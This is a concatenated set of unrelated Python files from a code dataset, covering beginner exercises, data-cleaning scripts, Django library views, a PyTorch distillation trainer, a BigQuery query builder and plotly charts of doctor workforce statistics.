{"seq_id":"179468777","text":"recipe = {'carrots': 4, 'apples': 10, 'water': 10}\n#print(recipe['apples'])\n\nstudents = [{'name': 'frederik',\n             'age': 21,\n             'nationality': ['German', 'Indonesian'],\n             'student_ID': 1},\n            {'name': 'melissa',\n             'age': 218,\n             'nationality': 'NewZealandish',\n             'student_ID': 2},\n            {'name': 'casey',\n             'age': 10,\n             'nationality': 'United States',\n             'student_ID': 3},\n            ]\n\nfor student in students:\n    print(student['age'])\n\n\n#print(students[0]['nationality'][0])\n\nstudents[1]['home country'] = None\nprint(students[1])\n\nhome = students[1].pop('home country')\n\nprint(students[1])\nprint(home)\n\n\n#print(recipe)\n","sub_path":"02_26_tue/dictionaries.py","file_name":"dictionaries.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"169417836","text":"from __future__ import absolute_import\nimport unittest\n\n\ndef subarray_sum_to_target(numbers, target):\n    \"\"\"\n    Determine the contiguous sub-array whose elements all sum to the target number\n\n    :param numbers: Unsorted array of positive integer numbers\n    :param target: The target value of the sub-array's sum\n\n    :return: The subarray whose elements all sum to the target\n    \"\"\"\n\n    \"\"\"\n    Create a sub-array defined by the lower and upper bounds starting at indices 0 and 1\n    Depending on the sub-array's sum compared to the target sum, we'll expand the array by including the next number\n    or shrink the sub-array by 
excluding the leftmost number.\n \"\"\"\n start = 0\n end = 1\n current_sum = numbers[start]\n\n while end < len(numbers):\n if current_sum < target:\n # The target is still larger than our sub-array's sum, expand the upper bound by one\n current_sum += numbers[end]\n end += 1\n elif current_sum > target:\n # The target is smaller than our sub-array's sum, shrink the sub-array by removing the leftmost element\n current_sum -= numbers[start]\n start += 1\n else:\n break\n\n return numbers[start: end]\n\n\nclass SubarraySumToTargetTest(unittest.TestCase):\n\n def test_valid(self):\n self.assertEquals(subarray_sum_to_target([1, 4, 20, 3, 10, 5], 33), [20, 3, 10])\n self.assertEquals(subarray_sum_to_target([1, 4, 0, 0, 3, 10, 5], 7), [4, 0, 0, 3])\n self.assertEqual(subarray_sum_to_target([1, 3, 10, 5, 1, 6], 16), [10, 5, 1])\n\n def test_invalid(self):\n self.assertEquals(subarray_sum_to_target([1, 4], 0), [])\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"python/subarray_sum_to_target.py","file_name":"subarray_sum_to_target.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"246713709","text":"import sys\nimport os\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\nimport xlrd\nimport csv\nimport sys\nimport timeit\nimport datetime\nsheetsPath = 'ANZLUsheets/'\n\n#----------------------------------------------------------------------\ndef open_file(path):\n workbook = xlrd.open_workbook(path)\n print(workbook.nsheets)\n csv_file_base_path = '';\n for sheet_name in workbook.sheet_names():\n print(sheet_name)\n #sheet_name = workbook.sheet_names()\n worksheet = workbook.sheet_by_name(sheet_name)\n\n csv_file_full_path = csv_file_base_path + sheet_name.lower().replace(\" - \", \"_\").replace(\" \",\"_\") + '.csv'\n csvfile = open(csv_file_full_path, 'w')\n writetocsv = csv.writer(csvfile, quoting = csv.QUOTE_ALL)\n for rownum in range(worksheet.nrows):\n #print(rownum, 'this is row num')\n rownum = int(rownum)\n #print(type(rownum), 'this is type')\n #print(worksheet.row_values(rownum))\n writetocsv.writerow(worksheet.row_values(rownum))\n\n csvfile.close()\n\n\n\n\n#----------------------------------------------------------------------\n\n\n'''if [f for f in os.listdir(sheetsPath)] == []:\n print(\"empty\")\n open_file('ANZLU.xlsx')\nelse: \n print(\"not empty\")\n'''\n\n\n\n\ndef tryconvert(value):\n #dt = (datetime.fromordinal(datetime(1900, 1, 1).toordinal() + int(value) - 2)).strftime('%d/%m/%Y')\n print(value, 'it')\n try:\n value = float(value)\n value = int(value)\n except ValueError:\n #print(type(value))\n pass\n #value = datetime.fromtimestamp(value/1000.0)\n dt = pd.to_datetime(value)#(datetime.strptime(value, '%d/%m/%Y'))\n #print(type(dt))\n #print(dt, type(dt))\n #print(type(dt))\n return dt\n '''try:\n dt = (datetime.fromordinal(datetime(1900, 1, 1).toordinal() + int(value) - 2)).strftime('%d/%m/%Y')\n #print(dt, type(dt))\n return dt\n except:\n #print(value)\n return value\n '''\ndef convert_to_shift(x):\n dict_shift={'T':'Twighlight', 'N': 'Night', 'D':'Day'}\n x = str(x)\n x = x.strip()\n shift = x[-1]\n try:\n shift = dict_shift[shift]\n #print(shift)\n return shift\n except (KeyError):\n #print(x)\n return x\n\ndef creating_DB():\n a =[]\n dateparse = lambda x: pd.datetime.strptime(x, '%Y-%m-%d')\n\n #df = pd.read_csv(infile, parse_dates=['datetime'], date_parser=dateparse)\n\n for filename in os.listdir('ANZLUsheets'):\n print(filename)\n 
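# --- Editor's sketch (not part of the dataset entries above) -------------------
# The two-pointer scan in subarray_sum_to_target stops once `end` reaches
# len(numbers), so a window that only matches after the final expansion (e.g.
# [1, 2, 3] with target 5) is missed. A variant that keeps shrinking after
# every expansion, assuming non-negative inputs as in the original:
def subarray_sum_to_target_v2(numbers, target):
    start, current_sum = 0, 0
    for end, value in enumerate(numbers):
        current_sum += value
        # shrink from the left until the window no longer overshoots
        while current_sum > target and start < end:
            current_sum -= numbers[start]
            start += 1
        if current_sum == target:
            return numbers[start:end + 1]
    return []

assert subarray_sum_to_target_v2([1, 2, 3], 5) == [2, 3]
assert subarray_sum_to_target_v2([1, 4, 20, 3, 10, 5], 33) == [20, 3, 10]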
tempdf = pd.read_csv('ANZLUsheets/'+ filename)#, parse_dates=['Date'], date_parser=dateparse)\n #tempdf['Date']=str(tempdf['Date'])\n #month = list(filename)\n #month = ''.join(month[0:4]) + '/' + ''.join(month[4:6])\n #date = [month for i in range(0,tempdf.shape[0])]\n #tempdf['date'] = date\n a.append(tempdf)\n df = pd.concat(a)\n\n paycode_dict = {}\n temp = df['Pay Code'][:]\n print(temp is df['Pay Code'])\n for leave_type in temp.unique():\n leave_type = str(leave_type)\n if 'SICK' in leave_type:\n if 'PAID' in leave_type:\n paycode_dict[leave_type] = 'SICK_PAID'\n else:\n paycode_dict[leave_type] = 'SICK'\n elif 'BEREAVEMENT' in leave_type:\n paycode_dict[leave_type] = 'BEREAVEMENT'\n elif 'OT' in leave_type:\n paycode_dict[leave_type] = 'OVERTIME'\n elif 'UNAPPROVED' in leave_type:\n paycode_dict[leave_type] = 'UNAPPROVED'\n else:\n paycode_dict[leave_type] = 'NORM'\n print(paycode_dict)\n print(temp.head)\n #print(temp.columns)\n temp = temp.map(paycode_dict)\n print(temp.head)\n df['Pay Code'] = temp\n df['Shift'] = df['LL6'].apply(lambda x: convert_to_shift(x))\n\n df['Last Name'] =df['First Name'] + df['Last Name']\n df.drop(columns = ['First Name'])\n #df['Date'] = df['Date'].apply(lambda x: tryconvert(x))\n\n #df[\"Pay Code\"] = df[\"Pay Code\"].map(paycode_dict)\n df.to_csv('DB_ANZLU_CLEAN.csv')\n\n\ndef check_necessary_update():\n today = datetime.datetime.today()\n today = str(today.year) + str(today.month) + '.csv'\n if today != os.listdir(sheetsPath)[-1]:\n #open_file('ANZLU.xlsx')\n #creating_DB()\n return True\n else:\n return False\ndef update():\n open_file('ANZLU.xlsx')\n creating_DB()\n os.system('streamlit run laybouranalysis.py')\n return\n#check_necessary_update()\n''' #dt = (datetime.fromordinal(datetime(1900, 1, 1).toordinal() + int(value) - 2)).strftime('%d/%m/%Y')\nprint(value, 'it')\ntry:\n value = float(value)\n value = int(value)\nexcept ValueError:\n #print(type(value))\n pass\n#value = datetime.fromtimestamp(value/1000.0)\ndt = pd.to_datetime(value)#(datetime.strptime(value, '%d/%m/%Y'))\n#print(type(dt))\n#print(dt, type(dt))\n#print(type(dt))\nreturn dt\n#print(value)\n#print(type(value))\n#value = 'nan'\n#return value'''","sub_path":"creatingDB.py","file_name":"creatingDB.py","file_ext":"py","file_size_in_byte":4957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"549558342","text":"\"\"\"\n 封装\n 行为: 标准属性\n 练习:exercise06.py\n 练习:exercise07.py\n\"\"\"\n\n# 读写属性age\nclass Wife:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n @property# 拦截读取 age = property(读取方法,None)\n def age(self):\n return self.__age\n\n @age.setter # 拦截写入 age.setter(写入方法)\n def age(self, value):\n if 20 <= value <= 50:\n self.__age = value\n else:\n raise ValueError(\"我不要\")\n\nw01 = Wife(\"小乔\", 25)\n# print(w01.get_age())\nprint(w01.age)\n\n# ---------------------------\n# 只读属性age\nclass Wife2:\n def __init__(self, name):\n self.name = name\n self.__age = 23\n\n @property# 拦截读取 age = property(读取方法,None)\n def age(self):\n return self.__age\n\nw02 = Wife2(\"大桥\")\n# w02.age = 30\n#---------------------\n# 只写属性age\nclass Wife3:\n def __init__(self, name):\n self.name = name\n self.age = 23\n\n def set_age(self, value):\n if 20 <= value <= 50:\n self.__age = value\n else:\n raise ValueError(\"我不要\")\n\n age = property(None,set_age)\n\nw03 = Wife3(\"大桥\")\nw03.age = 30\n# print(w03.age)# 
不能读取\n","sub_path":"python_base/code/day10/demo05.py","file_name":"demo05.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"415534427","text":"from django.shortcuts import render\nfrom django.http import JsonResponse, HttpResponse\nfrom django.template.loader import render_to_string\nfrom .models import librarybooks, BooksToStudents\nfrom django.db.utils import IntegrityError\nfrom admin2_manage.models import studentdetail\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom collections import defaultdict\ndef librarymain(request):\n books = librarybooks.objects.all()\n print(\"yessss\")\n print(books)\n return render(request, 'library.html', {'books': books})\n\n\ndef addBooks(request):\n if request.method == \"POST\":\n book_id = request.POST.get('book_id')\n book_name = request.POST['book_name']\n book_author = request.POST['book_author']\n no_books = request.POST['no_books']\n if no_books == 0 or len(book_name) == 0 or len(book_author) == 0:\n return JsonResponse({'status': 'wrong'})\n try:\n if (book_id == ''):\n book = librarybooks(book_name=book_name, book_author=book_author, book_ava=no_books)\n else:\n book = librarybooks(book_id=book_id, book_name=book_name, book_author=book_author, book_ava=no_books)\n book.save()\n except IntegrityError:\n return JsonResponse({'status': 'exist'})\n all_book = librarybooks.objects.values()\n book_data = list(all_book)\n return JsonResponse({'status': 'save', 'book_data': book_data})\n\n\ndef delete_book(request):\n if request.method == \"POST\":\n id = request.POST.get('sid')\n book_id = librarybooks.objects.get(book_id=id)\n book_id.delete()\n return JsonResponse({'status': 'done'})\n else:\n return JsonResponse({'status': 'undone'})\n\n\ndef edit_book(request):\n id = \"17EEBCS010\"\n ans = studentdetail.objects.get(student_id=id)\n check = BooksToStudents.objects.filter(stud_id__student_id='17EEBCS010')\n print(check)\n for ch in check:\n print(ch.books_id)\n if request.method == \"POST\":\n id = request.POST.get('sid')\n print(id)\n book_id = librarybooks.objects.get(book_id=id)\n book_data = {\"id\": book_id.book_id, \"name\": book_id.book_name, \"author\": book_id.book_author,\n \"number\": book_id.book_ava}\n return JsonResponse({'status': 'done', 'book_data': book_data})\n else:\n return JsonResponse({'status': 'undone'})\n\n\ndef booktostudent(request):\n dic = defaultdict(list)\n if request.method == \"POST\":\n bk_id = request.POST['book_id']\n date = request.POST['date']\n sd_id = request.POST['stud_id']\n stud_id = studentdetail.objects.get(student_id=sd_id)\n book_id = librarybooks.objects.get(book_name=bk_id)\n obj = BooksToStudents(stud_id=stud_id, books_id=book_id, date_issue=date)\n obj.save()\n check = BooksToStudents.objects.filter(stud_id__student_id=stud_id)\n for ch in check:\n dic[ch.bs_id] = [ch.books_id.book_name, ch.date_issue]\n return JsonResponse({'status': 'save','booksdata':dic})\n else:\n return JsonResponse({'satus': 'not_save'})\n\n\ndef studentbookdata(request):\n dic=defaultdict(list)\n if request.method==\"POST\":\n reg_id=request.POST['reg_id']\n try:\n student=studentdetail.objects.filter(student_id=reg_id).values()\n except ObjectDoesNotExist:\n student=None\n if student==None or len(student)==0:\n return JsonResponse({'status':'not_exist'})\n else:\n check = BooksToStudents.objects.filter(stud_id__student_id=reg_id)\n for ch in check:\n dic[ch.bs_id]=[ch.books_id.book_name,ch.date_issue]\n return 
JsonResponse({'status':'save','student':list(student),'bookstostudent':dic})\n else:\n return JsonResponse({'status':'not_save'})\n\ndef deletestudentbook(request):\n if request.method==\"POST\":\n bs_id=request.POST['id']\n print(bs_id)\n object=BooksToStudents.objects.get(bs_id=bs_id)\n object.delete()\n return JsonResponse({'status':'save'})\n else:\n return JsonResponse({'status':'not_save'})","sub_path":"librarymangement/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"172230006","text":"from __future__ import print_function\n\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport network\nfrom utils.dataloader import tinyimagenet_dataloader\nfrom utils.TinyImageNet_hierarchy import TinyImageNet_Superclass\nimport os\n\n\ndef idx_search(Superclasses):\n All_class = []\n for cls_name in Superclasses:\n All_class += TinyImageNet_Superclass[cls_name]\n All_class.sort()\n idx_dict = {}\n for supclass in Superclasses:\n idx_temp = []\n for i in TinyImageNet_Superclass[supclass]:\n idx_temp.append(All_class.index(i))\n idx_dict[supclass] = idx_temp\n\n return idx_dict\n\n\ndef total_combine(Superclasses):\n All_class = []\n for cls_name in Superclasses:\n All_class += TinyImageNet_Superclass[cls_name]\n All_class.sort()\n\n return All_class\n\n\ndef SD_distillation(y, teacher_scores, T, idx):\n p = F.log_softmax(y/T, dim=1) # student 20\n q = F.softmax(teacher_scores/T, dim=1) # teacher 5\n q_zeros = torch.zeros_like(p)\n q_zeros[:, idx] = q\n l_kl = F.kl_div(p, q_zeros, size_average=False) * (T**2) / y.shape[0]\n return l_kl\n\n\ndef train(args, teacher, student, device, train_loader, optimizer, epoch, idx_dict):\n ex, cl = [], []\n\n for i in teacher:\n ex.append(i[0].eval())\n cl.append(i[1].eval())\n\n student_EX, student_CL = student\n student_EX.train()\n student_CL.train()\n\n for batch_idx, (data, _) in enumerate(train_loader):\n data = data.to(device)\n\n optimizer.zero_grad()\n\n logit_list = []\n for i in range(len(args.Superclasses)):\n logit_list.append(cl[i](ex[i](data)).detach())\n\n s_logit = student_CL(student_EX(data))\n\n loss_list = []\n for i, j in enumerate(logit_list):\n temp_loss = SD_distillation(s_logit, j.detach(), 4, idx_dict[args.Superclasses[i]])\n loss_list.append(temp_loss)\n\n loss = sum(loss_list) / len(loss_list)\n loss.backward()\n optimizer.step()\n\n if args.verbose and batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}\\tLr: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. 
* batch_idx / len(train_loader), loss.item(), optimizer.param_groups[0]['lr']))\n\n\ndef test(student, device, test_loader, cur_epoch, test_only=False):\n student_EX, student_CL = student\n student_EX.eval()\n student_CL.eval()\n\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = student_CL(student_EX(data))\n test_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n\n if test_only:\n return correct / len(test_loader.dataset)\n\n print('\\nEpoch {} Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.4f}%)\\n'.format(\n cur_epoch, test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n return correct / len(test_loader.dataset)\n\n\ndef get_model(args):\n os.makedirs('DB_pretrained/SD_Scratch', exist_ok=True)\n\n total_idx = total_combine(args.Superclasses)\n idx_dict = idx_search(args.Superclasses)\n\n train_loader, test_loader = tinyimagenet_dataloader(args, train_subidx=total_idx, test_subidx=total_idx)\n\n student_EX = network.wresnet.wideresnet_ex(depth=16, num_classes=200, widen_factor=2, dropRate=0.0)\n student_CL = network.wresnet.wideresnet_cl(depth=16, num_classes=len(total_idx), EX_widen_factor=2,\n widen_factor=(0.25*len(args.Superclasses)), dropRate=0.0)\n\n student_EX_path = './DB_pretrained/SD_Scratch/SD_Scratch_EX_%s.pt' % args.Superclasses\n student_CL_path = './DB_pretrained/SD_Scratch/SD_Scratch_CL_%s.pt' % args.Superclasses\n\n if args.model_pretrained is True:\n student_EX.load_state_dict(torch.load(student_EX_path))\n student_CL.load_state_dict(torch.load(student_CL_path))\n\n student_EX, student_CL = student_EX.to(args.device), student_CL.to(args.device)\n student_EX, student_CL = student_EX.eval(), student_CL.eval()\n\n student = [student_EX, student_CL]\n best_acc = test(student, args.device, test_loader, 0, True)\n print(\"\\nModel for %s Acc=%.2f%%\" % (args.Superclasses, best_acc*100))\n\n return\n\n student_EX, student_CL = student_EX.to(args.device), student_CL.to(args.device)\n\n Scratch_EX = []\n for s in args.Superclasses:\n Scratch_EX_path = './DB_pretrained/Scratch/Scratch_EX_%s.pt' % [s]\n e = network.wresnet.wideresnet_ex(depth=16, num_classes=200, widen_factor=2, dropRate=0.0)\n e.load_state_dict(torch.load(Scratch_EX_path))\n e = e.to(args.device)\n e.eval()\n Scratch_EX.append(e)\n\n Scratch_CL = []\n for s in args.Superclasses:\n Scratch_CL_path = './DB_pretrained/Scratch/Scratch_CL_%s.pt' % [s]\n e = network.wresnet.wideresnet_cl(depth=16, num_classes=len(TinyImageNet_Superclass[s]),\n EX_widen_factor=2, widen_factor=0.25, dropRate=0.0)\n e.load_state_dict(torch.load(Scratch_CL_path))\n e = e.to(args.device)\n e.eval()\n Scratch_CL.append(e)\n\n teacher = []\n for i in zip(Scratch_EX, Scratch_CL):\n teacher.append(i)\n\n optimizer_S = optim.SGD(list(student_EX.parameters())+list(student_CL.parameters()), lr=args.lr,\n weight_decay=args.weight_decay, momentum=0.9)\n\n if args.scheduler:\n scheduler_S = optim.lr_scheduler.MultiStepLR(optimizer_S, [80, 160], 0.1)\n\n best_acc = 0\n\n student = [student_EX, student_CL]\n\n for epoch in range(1, args.model_epochs + 1):\n if args.scheduler:\n scheduler_S.step()\n\n train(args, teacher=teacher, student=student, device=args.device, 
train_loader=train_loader,\n optimizer=optimizer_S, epoch=epoch, idx_dict=idx_dict)\n acc = test(student, args.device, test_loader, epoch)\n\n if acc > best_acc:\n best_acc = acc\n torch.save(student_EX.state_dict(), student_EX_path)\n torch.save(student_CL.state_dict(), student_CL_path)\n\n print(\"\\nModel for %s Acc=%.2f%%\" % (args.Superclasses, best_acc*100))\n","sub_path":"TinyImageNet/SD_Scratch/SD_Scratch/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":6589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"443181572","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 2 13:09:20 2017\n\n@author: 凯风\n\"\"\"\n\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.datasets import load_boston\nfrom sklearn.model_selection import train_test_split\n\n# 准备数据\nboston = load_boston()\nX,Y = boston.data,boston.target\nX_train,X_test,Y_train,Y_test = train_test_split(X,Y,test_size=.3)\n\n'''\n K近邻回归:\n 优点:易于理解、无序评估过多参数\n 缺点:对不平衡问题存在较大问题、计算量大\n 模型的复杂度取决于algorithm,不同的构造树方法产生不同的复杂度\n'''\n\nrg = KNeighborsRegressor(n_neighbors=5, weights='distance', algorithm='auto', leaf_size=30, p=2, metric='minkowski', metric_params=None, n_jobs=1)\nrg.fit(X_train,Y_train)\nY_pre = rg.predict(X_test)\nrg.score(X_test,Y_test)\n\n'''\n n_neighbors 最重要的参数了算是,近邻数\n weights 权重形式\n uniform 每个样本均相等\n distance 按距离付给每个样本权重\n [callable] 用户自定义\n algorithm 用于计算最近邻的算法\n leaf_size 上一个参数中,需要一些叶节点数,传递给其中的比如kt-tree\n p 和下一个参数的一起用的,计算距离的\n metric 树的距离计算\n metric_params 上一个参数的一起用的\n n_jobs 暂不重要\n'''","sub_path":"Regression/Nearest_Neighbors_Regression.py","file_name":"Nearest_Neighbors_Regression.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"182211308","text":"class HistQueryFactory(object):\n \"\"\"\n h = HistQueryFactory()\n h.add_variable(\"R\",0,10,40)\n h.add_variable(\"BetaTOF\",0,1,10)\n h.add_condition(\"Rcutoff < R\")\n h.add_condition(\"Latitude > 0.8\")\n h.add_condition(\"Latitude < 0.9\")\n print str(h)\n \"\"\" \n def __init__(self, table=\"full_test.full_test\", bins='mid'):\n self.table = table\n self.bins = bins\n self.variables = {}\n self.binnames = {}\n self.varorder = []\n self.extra_conditions = []\n self.aggregators = [] \n self.join = None \n \n def add_variable(self, var, min=0, max=1, nbins=100, binname=None):\n self.variables[var] = [min, max, nbins]\n self.binnames[var] = var+\"_BIN\" if binname is None else binname\n self.varorder.append(var)\n \n def add_condition(self, condition):\n self.extra_conditions.append(condition)\n \n def add_aggregator(self, aggregator):\n self.aggregators.append(aggregator)\n \n def add_join(self, join, on, alias):\n self.join = (str(join), on, alias)\n \n def get_variables(self):\n return [self.binnames[v] for v in self.varorder]\n \n def __str__(self):\n select, where = [], []\n binexpr = \"STRING({mi:f} + ({rng:f})*FLOOR({N:f}*(({var})-({mi:f}))/{rng:f})/{N:f}) as {bname}\"\n for v in self.varorder:\n mi,ma,nb = self.variables[v]\n bname = self.binnames[v]\n select.append(binexpr.format(var=v, mi=mi, N=nb, rng=ma-mi, bname=bname))\n where.append(\"{0} >= {1} AND {0} < {2}\".format(v,mi,ma))\n \n if not self.aggregators:\n select += [\"COUNT(1) as count\"]\n else:\n select += self.aggregators \n \n where += self.extra_conditions\n \n if self.join is not None:\n self.table += \" JOIN EACH ({0}) AS {1} ON {2}\".format(*self.join)\n \n query = \\\n \"SELECT\\n 
{select}\\n\"\\\n \"FROM\\n {from}\\n\"\\\n \"WHERE\\n {where}\\n\"\\\n \"GROUP BY {bins}\\n\"\\\n \"ORDER BY {bins}\\n\"\n \n dic = {\n \"select\": \",\\n \".join(select),\n \"from\": self.table,\n \"where\":\" AND\\n \".join(where),\n \"bins\":\",\".join(self.get_variables())\n }\n return query.format(**dic) \n","sub_path":"mcmc_py/histQueryFactory.py","file_name":"histQueryFactory.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"171152724","text":"import plotly.express as px\nimport plotly.graph_objects as go\nimport pandas as pd\nimport numpy as np\nfrom plotly.subplots import make_subplots\n\n\n# 연도별, 성별 사망의사수 그래프\ndef makeDDFigure(dfDeadDoctor,year):\n year = str(year)\n\n exdfDeadPerson0 = dfDeadDoctor[0].iloc[:,26:]\n exdfDeadPerson0['성별']='Man'\n exdfDeadPerson1 = dfDeadDoctor[1].iloc[:,26:]\n exdfDeadPerson1['성별']='Woman'\n exdfDeadPerson = pd.concat([exdfDeadPerson0,exdfDeadPerson1])\n exdfDeadPerson = exdfDeadPerson.reset_index().rename(columns={\"index\": \"연도\"}).set_index('성별')\n\n deadPersonDict = {}\n\n for i in range(1952,2048):\n data = exdfDeadPerson[exdfDeadPerson['연도']==i]\n data.drop(['연도'], axis='columns', inplace=True)\n data = data.rename_axis(None).T\n data = data.reset_index().rename(columns={'index':'age'})\n deadPersonDict.setdefault(str(i), data)\n \n dead = deadPersonDict[year]\n trace3 = go.Bar(x=dead.age, y=dead.Man, name='남성',text=dead.Man,textposition='outside')\n trace4 = go.Bar(x=dead.age, y=dead.Woman, name='여성',text=dead.Woman,textposition='outside')\n\n data = [trace3, trace4]\n layout = go.Layout(title=year+'년 연령별 성별 사망 의사수')\n fig = go.Figure(data=data, layout=layout)\n\n fig.update_layout(\n # height=500,\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)',\n margin=dict(l=0),\n showlegend=True,\n yaxis=dict(range=[0,30])\n \n )\n\n fig.update_yaxes(title_text=\"사망 의사수\")\n fig.update_xaxes(title_text=\"연령\") \n\n return fig\n\n# 연도별, 성별 신규의사수\ndef makeNDFigure(dfNewDoctor,year):\n year = str(year)\n\n exdfNewPerson0 = dfNewDoctor[0].iloc[:,26:40]\n exdfNewPerson0['성별']='Man'\n exdfNewPerson1 = dfNewDoctor[1].iloc[:,26:40]\n exdfNewPerson1['성별']='Woman'\n exdfNewPerson = pd.concat([exdfNewPerson0,exdfNewPerson1])\n exdfNewPerson = exdfNewPerson.reset_index().rename(columns={\"index\": \"연도\"}).set_index('성별')\n\n newPersonDict = {}\n\n for i in range(1952,2048):\n data = exdfNewPerson[exdfNewPerson['연도']==i]\n data.drop(['연도'], axis='columns', inplace=True)\n data = data.rename_axis(None).T\n data = data.reset_index().rename(columns={'index':'age'})\n newPersonDict.setdefault(str(i), data)\n \n new = newPersonDict[year]\n trace3 = go.Bar(x=new.age, y=new.Man, name='남성',text=new.Man,textposition='outside')\n trace4 = go.Bar(x=new.age, y=new.Woman, name='여성',text=new.Woman,textposition='outside')\n\n data = [trace3, trace4]\n layout = go.Layout(title=year+'년 연령별 성별 신규 의사수')\n fig = go.Figure(data=data, layout=layout)\n\n fig.update_layout(\n # height=500,\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)',\n margin=dict(l=0),\n showlegend=True,\n yaxis=dict(range=[0,2000]) \n )\n\n fig.update_yaxes(title_text=\"신규 의사수\")\n fig.update_xaxes(title_text=\"연령\") \n return fig\n\n# 연도별, 성별 은퇴의사수\ndef makeRDFigure(dfRetireDoctor,year):\n year = str(year)\n\n exdfRetirePerson0 = dfRetireDoctor[0].iloc[:,45:95]\n exdfRetirePerson0['성별']='Man'\n exdfRetirePerson1 = dfRetireDoctor[1].iloc[:,45:95]\n exdfRetirePerson1['성별']='Woman'\n 
exdfRetirePerson = pd.concat([exdfRetirePerson0,exdfRetirePerson1])\n exdfRetirePerson = exdfRetirePerson.reset_index().rename(columns={\"index\": \"연도\"}).set_index('성별')\n\n retirePersonDict = {}\n\n for i in range(1952,2048):\n data = exdfRetirePerson[exdfRetirePerson['연도']==i]\n data.drop(['연도'], axis='columns', inplace=True)\n data = data.rename_axis(None).T\n data = data.reset_index().rename(columns={'index':'age'})\n retirePersonDict.setdefault(str(i), data)\n \n retire = retirePersonDict[year]\n trace3 = go.Bar(x=retire.age, y=retire.Man, name='남성',text=retire.Man,textposition='outside')\n trace4 = go.Bar(x=retire.age, y=retire.Woman, name='여성',text=retire.Woman,textposition='outside')\n\n data = [trace3, trace4]\n layout = go.Layout(title=year+'년 연령별 성별 은퇴 의사수')\n fig = go.Figure(data=data, layout=layout)\n\n fig.update_layout(\n # height=500,\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)',\n margin=dict(l=0),\n showlegend=True,\n yaxis=dict(range=[0,120])\n \n )\n fig.update_yaxes(title_text=\"은퇴 의사수\")\n fig.update_xaxes(title_text=\"연령\") \n return fig\n\ndef getDataframe(dfResultPerson):\n #남성 의사 인력 DataFrame, 변수명 manDoc\n manDoc = dfResultPerson[0].iloc[:,20:90]\n index = list(range(1950,2048))\n manDoc = manDoc.set_index([index])\n \n #여성 의사 인력 DataFrame, 변수명 womDoc\n womDoc = dfResultPerson[1].iloc[:,20:90]\n index = list(range(1950,2048))\n womDoc = womDoc.set_index([index])\n\n #남여 의사 인력 DataFrame, 변수명 bothDoc\n bothDoc = dfResultPerson[2]\n index = list(range(1950,2048))\n bothDoc = bothDoc.set_index([index])\n return [manDoc, womDoc, bothDoc]\n\ndef slicingPerson(dfResultPerson, year):\n value = []\n bothDoc =getDataframe(dfResultPerson)\n value.append(bothDoc[0].iloc[year])\n value.append(bothDoc[1].iloc[year])\n return value\n\n# 연도별, 성별 전체의사수 그래프\ndef makeANDFigure(dfResultPerson, year):\n yearValue = int(year)\n yearIndex = yearValue-1950\n\n womOfYear = pd.DataFrame(slicingPerson(dfResultPerson, yearIndex)[1])\n womOfYear = womOfYear.rename_axis('age').reset_index()\n numOfWom = womOfYear[yearValue].tolist()\n\n docManYear = pd.DataFrame(slicingPerson(dfResultPerson, yearIndex)[0])\n docManYear = docManYear.rename_axis('age').reset_index()\n numOfMan = docManYear[yearValue].tolist()\n text = docManYear[yearValue]\n \n trace3 = go.Bar(name='남성', x=list(docManYear['age']), y=list(docManYear[yearValue]))\n trace4 = go.Bar(name = '여성', x=list(womOfYear['age']), y=list(womOfYear[yearValue]))\n\n data = [trace3, trace4]\n layout = go.Layout(title=str(year)+'년 연령별 의사수')\n fig = go.Figure(data=data, layout=layout)\n fig.update_traces(text=text, textposition='outside')\n fig.update_layout(\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)',\n margin=dict(l=0),\n showlegend=True,\n yaxis=dict(range=[0,3000])\n )\n\n fig.update_yaxes(title_text=\"의사수\")\n fig.update_xaxes(title_text=\"연령\")\n\n return fig\n\ndef thousandDocGet(dfThousandPerDoctor):\n docPer1000 = dfThousandPerDoctor\n docPer1000 = docPer1000.dropna(axis = 0, how = 'any')\n #index 변경\n index = list(range(1950,2048))\n docPer1000 = docPer1000.set_index([index])\n docPer1000.columns = ['docnum']\n return docPer1000\n\ndef OECDDocGet():\n OECDPer1000 = pd.read_excel('data/OECD의사수.xlsx')\n OECDPer1000.columns = ['Division', 'Country', 